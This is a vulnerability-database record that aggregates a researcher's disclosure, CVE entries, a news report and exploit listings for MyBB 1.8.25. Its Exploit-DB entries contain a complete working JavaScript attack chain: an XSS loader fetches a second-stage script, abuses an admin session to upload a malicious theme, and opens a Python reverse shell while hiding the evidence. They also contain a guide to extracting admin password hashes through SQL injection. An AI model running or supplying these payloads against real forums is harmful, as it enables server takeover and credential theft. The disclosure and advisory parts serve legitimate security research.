Injection in Theme Properties leading to RCE\n\nThe XSS vulnerability described in the previous section enables an attacker to target administrators of a MyBB forum. If the attacker succeeds in injecting malicious JavaScript code into the browser of an administrative user with an active session, he can perform arbitrary actions with admin privileges. MyBB actively prevents even administrator users from executing arbitrary PHP code on the underlying server, thus we will present an authenticated RCE vulnerability that can be reached with administrative privileges.\n\nOne of the features MyBB admins can access is the theme manager of a MyBB forum. A MyBB theme consists of a list of key-value pairs. 
The key is a component of the current page, for example a welcome back message that should be displayed.\n\nHere is an example of how MyBB then displays such a component:\n\n```\neval('$modcplink = \"'.$templates->get('header_welcomeblock_member_moderator').'\";');\n```\n\nIn the above example, the theme key header_welcomeblock_member_moderator is requested. The value of this theme component could then look like the following:\n\n```\n<div id='welcomeblock_back'><b>{$mybb->user['username']}</b></div>\n```\n\nThis means that the final string that is passed to eval() would look like this:\n\n```\n$modcplink = \"<div id='welcomeblock_back'><b>{$mybb->user['username']}</b></div>\";\n```\n\nAs you can see, the contents are enclosed in double quotes and the PHP variable {$mybb->user['username']} is interpolated into the string. The reason that this feature does not enable remote code execution (RCE) immediately is that MyBB escapes double quotes in template values when they are stored into the database. Thus, it is impossible to break out of the double-quoted string. Another PHP trick exists that could have resulted in RCE: an attacker could have modified the template and added a $ to the variable that becomes string-interpolated, like the following:\n\n```\n$modcplink = \"<div id='welcomeblock_back'><b>${arbitrary_function()}</b></div>\";\n```\n\nHowever, MyBB also prevents this unique PHP quirk by preventing administrators from inserting such interpolations. This meant that if we could find a bypass for MyBB\u2019s filter, we could still execute arbitrary PHP code. We achieved this bypass through an SQL injection.\n\nMyBB themes can be imported through XML files which contain a set of theme properties such as the image directory or the version. Additionally, a list of key-value pairs is read where the name correlates to the key of the theme component and the value to the contents. 
Here is an example:\n\n```\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<theme name=\"Theme Example\" version=\"1405\">\n <properties>\n <templateset><![CDATA[10]]></templateset>\n <imgdir><![CDATA[images/]]></imgdir>\n <logo><![CDATA[images/logo.png]]></logo>\n </properties>\n <stylesheets></stylesheets>\n <templates>\n <template name=\"header_welcomeblock_member_moderator\" version=\"1404\"><![CDATA[\n <div id='welcomeblock_back'><b>{$mybb->user['username']}</b></div>\n ]]></template>\n </templates>\n</theme>\n```\n\nWhenever an administrator imports such a theme, the XML is parsed and the properties of the theme are stored into the database. As it turned out, the templateset property was susceptible to a second-order SQL injection. \n\nWhen these themes are uploaded, they are inserted into the database of the MyBB instance and are later used in other SQL queries without any sanitization.\n\nWe already touched on how the values of MyBB template components are passed to eval() calls, thus leading to arbitrary PHP code execution should an attacker be able to control the value of a theme property. The following paragraphs describe an SQL injection, which enables an attacker to inject malicious template code into eval() calls.\n\nAt the beginning of each page load, MyBB fetches all possible template values from the database and stores them in a cache. The SQL query that fetches all template values uses the templateset property, which is embedded unsanitized into the query string. Therefore, an SQL injection vulnerability occurs:\n\n```\n$query = $db->simple_select(\"templates\", \"title,template\",\n \"title IN (''$sql) AND sid IN ('-2','-1','\".$theme['templateset'].\"')\",\n array('order_by' => 'sid', 'order_dir' => 'asc')\n);\n```\n\nAs shown, the query simply interpolates the templateset attribute. With a malicious theme, one can control this attribute and let this cache function return attacker-controlled values. 
Here is an example of such a crafted theme with an SQL injection payload:\n\n```\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<theme name=\"Default\" version=\"1821\">\n <properties>\n <templateset>') AND 1=0 UNION SELECT title, '${passthru(\\'ls\\')}' from mybb_templates -- </templateset>\n </properties>\n</theme>\n```\n\nThe resulting SQL query looks like the following:\n\n```\nSELECT title, template FROM mybb_templates WHERE \n title IN ('header_welcomeblock_member_moderator', '...') AND SID IN ('-2', '-1', '') \n AND 1=0 UNION SELECT title, '${passthru(\\'ls\\')}' from mybb_templates -- ')\n```\n\nThrough this SQL injection, it is possible to poison the template cache with attacker-controlled values, which do not undergo any escaping or sanitization. As these template values, which are now completely attacker-controlled, are passed to eval() inside the double-quoted string, we can execute arbitrary PHP code within the ${...} syntax. As a result, an attacker can execute arbitrary PHP code and compromise the underlying server.\n\n## Timeline\n\n| Date | Event |\n| ---------- | --------------------------------------------------- |\n| 22.02.2021 | Both vulnerabilities were reported to the MyBB team |\n| 22.02.2021 | The MyBB team acknowledges both vulnerabilities |\n| 04.03.2021 | The MyBB team proposes patches |\n| 05.03.2021 | We confirm the patches |\n| 10.03.2021 | MyBB releases patch version 1.8.26 |\n\n## Summary\n\nMulti-step parsers and HTML renderers always run the risk of corrupting their own output, sometimes with security implications. We disclosed similar vulnerabilities in the past to [WordPress](https://blog.ripstech.com/2019/wordpress-csrf-to-rce/) and [Magento](https://blog.ripstech.com/2019/magento-rce-via-xss/). It is advisable not to let regexes grow too complex in these parsers, especially when they are meant to prevent security issues. 
We hope that the SonarSource community can learn from these mistakes to develop secure code, and we enjoyed sharing our findings as a guest blog post at SonarSource. Last but not least, we would like to thank the MyBB team for their great cooperation on resolving these issues very quickly.", "published": "2021-03-19T00:00:00", "type": "seebug", "title": "MyBB Unauthenticated RCE Vulnerability (CVE-2021-27889 CVE-2021-27890)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "modified": "2021-03-19T00:00:00", "id": "SSV:99162", "href": "https://www.seebug.org/vuldb/ssvid-99162", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2022-01-13T05:29:29", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T00:00:00", "type": "exploitdb", "title": "MyBB 1.8.25 - Chained Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890", "2021-27890", "2021-27889"], "modified": "2021-03-22T00:00:00", "id": "EDB-ID:49696", 
"href": "https://www.exploit-db.com/exploits/49696", "sourceData": "# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution\r\n# Exploit Author: SivertPL (kroppoloe@protonmail.ch)\r\n# Date: 19.03.2021\r\n# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().\r\n# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27889, CVE-2021-27890\r\n\r\n# Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \r\n# The exploit requires the target administrator to have a valid ACP session.\r\n# Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ\r\n# Guide:\r\n\r\n1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. \r\n\r\nPlease replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.\r\n\r\n document.write('<script src=http://localhost:8000/second_stage.js></script>');\r\n\r\n2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.\r\n\r\nYou can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/\r\n\r\n3) Put the resulting encoded payload in the nested autourl vulnerability vector:\r\n\r\n [img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]\r\n\r\n4) The final payload should look like this:\r\n\r\n [img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]\r\n\r\n5) Send the full vector to the target, either by 
private message, a post, or any other place where MyCode (BBCode) is supported.\r\nOnce the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.\r\n\r\nAfter the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.\r\n\r\n6) Enjoy your RCE! For educational purposes only. \r\n\r\n\r\nconst REVERSE_SHELL_IP = \"localhost\";\r\nconst REVERSE_SHELL_PORT = 5554;\r\n\r\nconst PAYLOAD_XML_NAME = \"payload\";\r\nconst PAYLOAD_XML_VERSION = \"1821\";\r\n\r\nconst XML_PROLOG = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\";\r\n\r\nconst SHELL_PAYLOAD = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\" + REVERSE_SHELL_IP + \"\\\",\" + REVERSE_SHELL_PORT + \"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\nconst SQL_PAYLOAD = \"') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\\\'\" + btoa(SHELL_PAYLOAD) + \"\\\\'))}' from mybb_templates -- \";\r\n\r\n\r\n// Trigger the actual vulnerability, force cache reload.\r\n// Stage: Final\r\nfunction trigger() {\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', '/index.php');\r\n request.send();\r\n}\r\n\r\n\r\n// Poison the cache.\r\n// Stage: 6\r\nfunction set_as_default(token, tid) {\r\n\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);\r\n\r\n request.onload = function() { trigger(); };\r\n\r\n request.send();\r\n}\r\n\r\n// Get the TID of the downloaded theme payload\r\n// Stage: 5\r\nfunction get_payload_tid(token) {\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', '/admin/index.php?module=style-themes');\r\n\r\n request.responseType = 
\"document\";\r\n\r\n request.onload = function() { \r\n \r\n var response = request.response;\r\n\r\n var aTags = response.getElementsByTagName(\"a\");\r\n var searchText = \"payload\";\r\n var found;\r\n\r\n for (var i = 0; i < aTags.length; i++) {\r\n if (aTags[i].textContent == searchText) {\r\n found = aTags[i];\r\n break;\r\n }\r\n }\r\n\r\n var href = found.getAttribute(\"href\");\r\n\r\n var urlParams = new URLSearchParams(href);\r\n\r\n var tid = urlParams.get(\"tid\");\r\n \r\n\r\n set_as_default(token, tid); \r\n };\r\n\r\n request.send();\r\n\r\n}\r\n\r\n\r\n// We pass the actual request to upload the template exploiting the second link of the exploit chain\r\n// Stage: 4\r\nfunction upload_template(token) {\r\n\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('POST', '/admin/index.php?module=style-themes&action=import');\r\n\r\n var data = new FormData();\r\n\r\n data.append('my_post_key', token);\r\n data.append('local_file', build_payload(), PAYLOAD_XML_NAME + \".xml\");\r\n data.append('import', 0);\r\n data.append('url', '');\r\n data.append('tid', '1');\r\n data.append('name', \"payload\");\r\n data.append(\"version_compat\", 1);\r\n data.append(\"import_stylesheets\", 1);\r\n data.append(\"import_templates\", 1);\r\n\r\n request.onload = function() { \r\n // After uploading the template, set it as default to poison the cache\r\n get_payload_tid(token)\r\n };\r\n\r\n\r\n request.send(data);\r\n}\r\n\r\n\r\n// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.\r\n// Stage: 3\r\nfunction build_payload() {\r\n var xmlDom = document.implementation.createDocument(\"\", \"\", null);\r\n \r\n var theme = xmlDom.createElement(\"theme\");\r\n theme.setAttribute(\"name\", PAYLOAD_XML_NAME);\r\n theme.setAttribute(\"version\", PAYLOAD_XML_VERSION);\r\n\r\n var properties = xmlDom.createElement(\"properties\");\r\n theme.appendChild(properties);\r\n\r\n var template_set = 
xmlDom.createElement(\"templateset\");\r\n template_set.innerHTML = SQL_PAYLOAD;\r\n properties.appendChild(template_set);\r\n\r\n xmlDom.appendChild(theme);\r\n\r\n var serialized = new XMLSerializer().serializeToString(xmlDom);\r\n\r\n var result = XML_PROLOG + serialized;\r\n var file = new File([result], PAYLOAD_XML_NAME);\r\n \r\n return file;\r\n}\r\n\r\n\r\n// Acquire the anti-CSRF token \r\n// Stage: 2\r\nfunction acquire_token(request) {\r\n\r\n var response = request.response;\r\n var token = response.getElementsByName(\"my_post_key\")[0].value;\r\n\r\n if(token == null) { \r\n /* ACP Session either expired or wasn't established to begin with */\r\n return;\r\n }\r\n\r\n // We have acquired the anti-CSRF token now.\r\n upload_template(token);\r\n}\r\n\r\n\r\n// ACP Code Execution\r\n// Stage: 1\r\nfunction exec_acp() {\r\n \r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', 'admin/index.php?module=style-themes&action=import');\r\n request.responseType = \"document\";\r\n\r\n request.onload = function() { \r\n acquire_token(request); \r\n };\r\n\r\n request.send();\r\n}\r\n\r\n\r\n// We hide the payload, to raise less suspicions\r\n// Stage: 0\r\nfunction hide() {\r\n\r\n var getAll = document.querySelectorAll(\"[src*='http://xyzsomething.com/image?)<a href=']\");\r\n\r\n getAll.forEach(element => {\r\n var pNode = element.parentNode.innerText=\"lmao whatever you say\";\r\n });\r\n \r\n}\r\n\r\n// Entry point of the exploit\r\nfunction start() {\r\n hide();\r\n exec_acp(); \r\n}\r\n\r\n\r\nstart();", "sourceHref": "https://www.exploit-db.com/download/49696", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:39:04", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", 
"baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "exploitdb", "title": "MyBB 1.8.25 - Poll Vote Count SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-27946", "CVE-2021-27889", "CVE-2021-27946"], "modified": "2021-03-23T00:00:00", "id": "EDB-ID:49699", "href": "https://www.exploit-db.com/exploits/49699", "sourceData": "# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection\r\n# Exploit Author: SivertPL (kroppoloe@protonmail.ch)\r\n# Date: 20.03.2021\r\n# Description: Lack of sanitization in the \"votes[]\" parameter in \"Edit Poll\" causes a second-order semi-blind SQL Injection that is triggered when performing a \"Move/Copy\" operation on the thread.\r\n# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27946\r\n\r\nReferences:\r\n\r\n 1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \r\n 2) https://vuldb.com/?id.171307\r\n 3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch \r\n\r\nIn order to trigger the vulnerability, you must have permission to edit polls. 
\r\nModerators and administrators can usually do it, but in some configurations regular users can do it as well.\r\n\r\nIn case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash.\r\n\r\nOtherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary\r\ninjections automatically, and send the resulting hashes to your server.\r\n\r\nThis is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of \r\na very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector.\r\n\r\nThis vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used.\r\nIn such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash).\r\n\r\nGuide:\r\n\r\n1) Make a thread with a public poll, with multiple choices.\r\n\r\n2) Vote on at least one choice.\r\n\r\n3) Go to the \"Edit poll\" section of the poll.\r\n\r\n4) Place the following payload in the \"vote count\" input (any entry within the votes[] parameter in the resulting POST request).\r\n\r\n 1','2',ascii((select version())),'0','0','1','1') -- -a\r\n\r\n5) Save the poll.\r\n\r\n6) Perform a \"Move/Copy\" operation on the thread, moving it to a different forum, or making a copy in the same forum.\r\n\r\nThis is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect.\r\n\r\n7) Go to the copied/moved version of the thread (you should be redirected there automatically).\r\n\r\n8) Go to the \"Show Results\" section of the poll.\r\n\r\n9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select 
query. \r\n\r\nSince this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()).\r\nOther parameters in the INSERT query that we are injecting into are either too small, or unfeasible. \r\nUnsigned integer provides enough space to extract required data when enough requests are made.\r\n\r\nIn this case, the number is the ASCII code of the first character of the result of the injected select version() query.\r\nThis way we can transfer the output through this covert channel, one character at a time.\r\n\r\nIn order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int.\r\n\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 2, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 3, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 4, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 5, 1))),'0','0','1','1') -- -a\r\n\r\n... etc.\r\n\r\nThis will send the ASCII codes of every char of the hashed password through the integer covert channel.\r\n\r\n\r\n10) After sending enough requests, you should have the hashed admin password. 
Repeat the entire process to acquire the salt.", "sourceHref": "https://www.exploit-db.com/download/49699", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T16:16:20", "description": "SQL Injection vulnerability in MyBB before 1.8.26 via theme properties included in theme XML files.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-15T18:15:00", "type": "cve", "title": "CVE-2021-27890", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27890"], "modified": "2021-09-21T17:48:00", "cpe": [], "id": "CVE-2021-27890", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27890", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T16:16:17", "description": "Cross-site Scripting (XSS) vulnerability in MyBB before 1.8.26 via Nested Auto URL when parsing messages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-03-15T17:15:00", "type": "cve", "title": "CVE-2021-27889", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889"], "modified": "2021-09-21T17:48:00", "cpe": [], "id": "CVE-2021-27889", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27889", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "thn": [{"lastseen": "2022-05-09T12:38:26", "description": "[](<https://thehackernews.com/images/-VYbGanTVJLw/YFNO_wuzwVI/AAAAAAAACDw/sbjkgjkY8R856b9AlWi9YQsis2JTdRM9gCLcBGAsYHQ/s0/mybb.jpg>)\n\nA pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account.\n\nThe flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it [released](<https://blog.mybb.com/2021/03/10/mybb-1-8-26-released-security-release/>) an update (version 1.8.26) on March 10 addressing the issues.\n\nMyBB, formerly MyBBoard and originally MyBulletinBoard, is free and open-source forum software developed using PHP and MySQL. 
According to internet assets search engine Spyse, there are at least [2,100 potentially vulnerable domains](<https://spyse.com/target/technology/MyBB>) that have MyBB installed.\n\nAccording to the researchers, the first issue \u2014 a nested auto URL persistent XSS vulnerability (CVE-2021-27889) \u2014 stems from how MyBB parses messages containing URLs during the rendering process, thus enabling any unprivileged forum user to embed stored XSS payloads into threads, posts, and even private messages.\n\n\"The vulnerability can be exploited with minimal user interaction by saving a maliciously crafted MyCode message on the server (e.g. as a post or Private Message) and pointing a victim to a page where the content is parsed,\" MyBB [said](<https://github.com/mybb/mybb/security/advisories/GHSA-xhj7-3349-mqcm>) in an advisory.\n\nThe second vulnerability concerns an SQL injection ([CVE-2021-27890](<https://github.com/mybb/mybb/security/advisories/GHSA-r34m-ccm8-mfhq>)) in a forum's theme manager that could result in an authenticated RCE. A successful exploitation occurs when a forum administrator with the \"Can manage themes?\" permission imports a maliciously crafted theme, or a user, for whom the theme has been set, visits a forum page. \n\n\"A sophisticated attacker could develop an exploit for the Stored XSS vulnerability and then send a private message to a targeted administrator of a MyBB board,\" the researchers [outlined](<https://blog.sonarsource.com/mybb-remote-code-execution-chain>) in a technical write-up. \"As soon as the administrator opens the private message, on his own trusted forum, the exploit triggers. 
An RCE vulnerability is automatically exploited in the background and leads to a full takeover of the targeted MyBB forum.\"\n\nBesides the two aforementioned vulnerabilities, version 1.8.26 also resolves four other security shortcomings that were identified by the MyBB Team, including \u2014\n\n * [CVE-2021-27946](<https://github.com/mybb/mybb/security/advisories/GHSA-23m9-w75q-ph4p>) \\- Improper validation of the number of votes in thread poll options, leading to SQL injection\n * [CVE-2021-27947](<https://github.com/mybb/mybb/security/advisories/GHSA-jjx8-8mcp-7h65>) \\- Improper sanitization of certain forum data, causing SQL injection when used in subsequent queries\n * [CVE-2021-27948](<https://github.com/mybb/mybb/security/advisories/GHSA-3p9w-2q65-r6g2>) \\- Additional User Groups ID numbers can be saved without proper validation in the Admin Control Panel, resulting in SQL injection, and\n * [CVE-2021-27949](<https://github.com/mybb/mybb/security/advisories/GHSA-cmmr-39v8-8rx2>) \\- A reflected XSS vulnerability in custom Moderator Tools, when user input attached to CSRF token-protected POST requests is not properly sanitized\n\nMyBB users are advised to upgrade to the [latest version](<https://mybb.com/versions/1.8.26/>) to mitigate the risk associated with the flaws.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-18T16:08:00", "type": "thn", "title": "Critical RCE Flaw Reported in MyBB Forum Software\u2014Patch Your Sites", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890", "CVE-2021-27946", "CVE-2021-27947", "CVE-2021-27948", "CVE-2021-27949"], "modified": "2021-03-22T06:29:16", "id": "THN:3152B45B015211515D21C5C8A05763F5", "href": "https://thehackernews.com/2021/03/critical-rce-flaw-reported-in-mybb.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-03-23T16:46:47", "description": "", "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "MyBB 1.8.25 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-27889", "CVE-2021-27946"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161918", "href": 
"https://packetstormsecurity.com/files/161918/MyBB-1.8.25-SQL-Injection.html", "sourceData": "`# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection \n# Exploit Author: SivertPL (kroppoloe@protonmail.ch) \n# Date: 20.03.2021 \n# Description: Lack of sanitization in the \"votes[]\" parameter in \"Edit Poll\" causes a second-order semi-blind SQL Injection that is triggered when performing a \"Move/Copy\" operation on the thread. \n# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip \n# CVE: CVE-2021-27946 \n \nReferences: \n \n1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \n2) https://vuldb.com/?id.171307 \n3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch \n \nIn order to trigger the vulnerability, you must have permission to edit polls. \nModerators and administrators can usually do it, but in some configurations regular users can do it as well. \n \nIn case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash. \n \nOtherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary \ninjections automatically, and send the resulting hashes to your server. \n \nThis is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of \na very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector. \n \nThis vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used. \nIn such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash). \n \nGuide: \n \n1) Make a thread with a public poll, with multiple choices. 
\n \n2) Vote on at least one choice. \n \n3) Go to the \"Edit poll\" section of the poll. \n \n4) Place the following payload in the \"vote count\" input (any entry within the votes[] parameter in the resulting POST request). \n \n1','2',ascii((select version())),'0','0','1','1') -- -a \n \n5) Save the poll. \n \n6) Perform a \"Move/Copy\" operation on the thread, moving it to a different forum, or making a copy in the same forum. \n \nThis is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect. \n \n7) Go to the copied/moved version of the thread (you should be redirected there automatically). \n \n8) Go to the \"Show Results\" section of the poll. \n \n9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query. \n \nSince this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()). \nOther parameters in the INSERT query that we are injecting into are either too small, or unfeasible. \nUnsigned integer provides enough space to extract required data when enough requests are made. \n 